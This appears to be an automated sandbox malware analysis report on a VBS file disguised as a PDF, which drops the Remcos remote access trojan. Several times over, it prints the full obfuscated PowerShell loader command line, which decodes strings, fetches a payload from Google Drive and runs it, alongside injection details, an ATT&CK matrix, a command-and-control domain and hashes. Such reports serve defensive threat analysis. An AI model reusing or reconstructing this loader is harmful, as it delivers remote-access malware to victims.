              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo 
ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo 
ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886C502FD push ds; iretd 2_2_00007FF886C503E2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886C50CC4 push ds; iretd 2_2_00007FF886C50CCA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886C51039 pushad ; iretd 2_2_00007FF886C5103A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886D24E9D push ebx; ret 2_2_00007FF886D24F5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_042F449D push cs; retf 4_2_042F4532
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_042F472D push ds; retf 4_2_042F4732
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_042F473D push ds; retf 4_2_042F4742
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06ED2AF6 pushad ; iretd 4_2_06ED2B00
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06EDEAAB pushad ; iretd 4_2_06EDEAAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06EDEA99 pushad ; iretd 4_2_06EDEAA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06ED2B08 pushad ; iretd 4_2_06ED2B09
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4695
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5181
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5830
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4010
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: powershell.exe, 00000002.00000002.1541299275.000002919891C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf=%SystemRoot%\system32\mswsock.dllsnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholt'#P
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0095D6F8 LdrInitializeThunk,4_2_0095D6F8

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_7796.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 38F0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 267FDE8
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#akaniaceae herefords skifertavles #>;$tennisalbue='landgrnse';<#tallerkenret gravkers bandonion #>;$unvicarious156=$host.privatedata;if ($unvicarious156) {$sanitetsartikel++;}function rundholts($affectationist){$blasfemiernes=$hittebarnets+$affectationist.length-$sanitetsartikel;for( $fastendes=5;$fastendes -lt $blasfemiernes;$fastendes+=6){$composersatserne+=$affectationist[$fastendes];}$composersatserne;}function katedres($threadlike){ . ($absoluthed) ($threadlike);}$oxyhemocyanin=rundholts 'pa opmrach obarnez ormi con lptolel syntacompo/nonse5 rheo.netw 0 opsi tvanm(,lyvewunembib,eotn pasadpostcoou,dew unars dagb mussondvaletnymp. spros1alp n0a ton.ji ga0runds; myel landiwmalniil thonunmud6pr,se4 spek;tilba udloexsyste6 anne4ignor; unig rejmrgoalpv awki: arto1maale2dogto1pupil.outbl0sem h)sl,ms shr wgbredlendhavcd uidk runco,aser/p.wer2cenes0milje1talle0sikke0 dybt1over 0 brun1mi ia nonrefserviitomboruf gleudsmyftormeo bathxsamle/gdann1till 2blemi1stipe.bookn0sgete ';$paahngsmotors=rundholts 'ci.arutrv esr.cereapostr.amme-evaluavoka g turgeperbonredistphyto ';$sympatisrers=rundholts 'aboithudp,ntsmaratxanthpfuldbsg dro:p aco/sc ot/besind uachrhvidei opulvno pheaflas.hy,erginforo hurkostoreglabill bilre s lv.pteroc rytmopiddlm bi l/sporvu anaccindre?dataoesti fxmaterp yde oopgavrfalsktswap = lyndplasho supewr.petngrofeltj lko ecodaskriddamuei&.orsgik ssedr sso= inde1inse 6u,stoksubbru ha,pqs.rimagloosqregel_gennexsuper6lodgiz s,urb ysfub impuhmu,tiacontegv nstn i mankredis stude da.awurdypu b les.ilatwforedubawdsaverbazhjttax kloat pr.cxsolodg ballv fags7 papn ';$afrimninger=rundholts ' dies> iamb ';$absoluthed=rundholts 'indadirekruedissex gyro ';$fastendesnconsultable='misappropriating';$newfangle='\forsvarsministers.sca';katedres (rundholts 'rbest$tienngletmelkonomo 
ubcubtrommaslugglgaade:overmmjewbiiearlilsdmefltr,ppigrillolodren fmatebysterprivi=toupe$ asseerotatntrustvhelv :fasefahoa.cp .apip diurdstaala.alketdietha manu+datak$h ternoutbleud,paw dis.f scamast genrep.iglse.al crabe prel ');katedres (rundholts 'grnse$sinu gs.blel.estaosamarbrefuea min lsema.:va.sopstro askalkltechnaskrabvatomverigsgrgal.eerema,sbi al=hornb$irizistestiyreim,munm sp oddvave,rttsociaiunsubs indlr udbreerfarrfolkesalter.shrins ag.rpbild,lbrugsi fllet gge (hjemk$ sperapuslifint rr sprgien.anmhusbenfatheiricarnskandg sharest,icroverr)di mi ');katedres (rundholts 'kn wf[forthn sygee o tptdisbu.metals skriesmartrjalo,vtiptiiharpwc vikte,welfpdermaotidsbi malcnmonotttrollm f,aaa shign ste afllesgudvanenivelr sawe]tkked: molm:trak,sunseneforinckissiurefelrlustri artht noncy rustptankvrbogstobo ettarrecononh cisfl.ovraiclphyl ch ff=preco apath[anmelnydedeeodysstsynus.besnasacclaealbsrcsidesucircur hotoia.sisttvangyudmunpstaderho liogeno,t f,sioko,doct.lesohybrilindbitnormay tranplondoeswitc]kinet:rimes: unret ancl impesroolu1vault2 ,kri ');$s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match; File source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: Yara match; File source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: msiexec.exe PID: 7400, type: MEMORYSTR
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 111 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              Behavior Graph ID: 1523161, Sample: 18000012550_20240930_007886..., Startdate: 01/10/2024, Architecture: WINDOWS, Score: 100
              • Sample: contacts drive.usercontent.google.com and drive.google.com. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures. Top-level processes started: wscript.exe, powershell.exe, msiexec.exe
              • wscript.exe: started powershell.exe. Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
              • powershell.exe (started by wscript.exe): started conhost.exe; contacted drive.usercontent.google.com (142.250.185.97, 443, 49707, 49710, GOOGLEUS, United States) and drive.google.com (216.58.206.78, 443, 49706, 49709, GOOGLEUS, United States). Signature: Found suspicious powershell code related to unpacking or dynamic code loading
              • powershell.exe (top-level): started msiexec.exe and conhost.exe. Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
              • msiexec.exe (started by powershell.exe): Signature: Detected Remcos RAT

              Source | Detection | Scanner | Label
              18000012550_20240930_0078864246#U00b7pdf.vbs | 13% | ReversingLabs | Script.Trojan.Heuristic
              18000012550_20240930_0078864246#U00b7pdf.vbs | 8% | Virustotal |
              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label
              drive.google.com | 0% | Virustotal |
              drive.usercontent.google.com | 1% | Virustotal |

              Source | Detection | Scanner | Label
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
              https://go.micro | 0% | URL Reputation | safe
              https://contoso.com/License | 0% | URL Reputation | safe
              https://contoso.com/Icon | 0% | URL Reputation | safe
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe
              https://contoso.com/ | 0% | URL Reputation | safe
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe
              https://aka.ms/pscore68 | 0% | URL Reputation | safe
              https://apis.google.com | 0% | URL Reputation | safe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
              http://drive.usercontent.google.com | 1% | Virustotal |
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
              https://drive.usercontent.google.com/ | 1% | Virustotal |

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              drive.google.com | 216.58.206.78 | true | false | | unknown
              drive.usercontent.google.com | 142.250.185.97 | true | false | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              a458386d9.duckdns.org | true | | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              216.58.206.78 | drive.google.com | United States | 15169 | GOOGLEUS | false
              142.250.185.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1523161
              Start date and time: 2024-10-01 07:45:45 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 6m 50s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 15
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: 18000012550_20240930_0078864246#U00b7pdf.vbs
              renamed because original name is a hash value
              Original Sample Name: 18000012550_20240930_0078864246pdf.vbs
              Detection: MAL
              Classification: mal100.troj.expl.evad.winVBS@9/7@2/2
              EGA Information: Failed
              HCA Information:
              • Successful, ratio: 90%
              • Number of executed functions: 61
              • Number of non-executed functions: 2
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 7796 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 8036 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      Time | Type | Description
                                      01:46:40 | API Interceptor | 84x Sleep call for process: powershell.exe modified
                                      Match:3b5074b1b5d032e5620f69f9f700ff0e
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 216.58.206.78, 142.250.185.97
                                      Scanned Purchase List.vbs | malicious | Unknown | 216.58.206.78, 142.250.185.97
                                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 216.58.206.78, 142.250.185.97
                                      Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 216.58.206.78, 142.250.185.97
                                      mtgjyX9gHF.exe | malicious | Quasar | 216.58.206.78, 142.250.185.97
                                      PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 216.58.206.78, 142.250.185.97
                                      2zYP8qOYmJ.exe | malicious | Unknown | 216.58.206.78, 142.250.185.97
                                      RFQ-00032035.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 216.58.206.78, 142.250.185.97
                                      RFQ -SCHOTTEL Type SRP200.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 216.58.206.78, 142.250.185.97
                                      Purchase Order 007823-PO# 005307.exe | malicious | Snake Keylogger, VIP Keylogger | 216.58.206.78, 142.250.185.97
                                      Match:37f463bf4616ecd445d4a1937da06e19
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 216.58.206.78, 142.250.185.97
                                      SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 216.58.206.78, 142.250.185.97
                                      Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 216.58.206.78, 142.250.185.97
                                      6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 216.58.206.78, 142.250.185.97
                                      hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar | 216.58.206.78, 142.250.185.97
                                      N83LFtMTUS.exe | malicious | LummaC, Stealc, Vidar | 216.58.206.78, 142.250.185.97
                                      Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exe | malicious | Remcos, GuLoader | 216.58.206.78, 142.250.185.97
                                      file.exe | malicious | LodaRAT | 216.58.206.78, 142.250.185.97
                                      file.exe | malicious | XWorm, Xmrig | 216.58.206.78, 142.250.185.97
                                      Payment Advice Note_Pdf.exe | malicious | Azorult, GuLoader | 216.58.206.78, 142.250.185.97
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
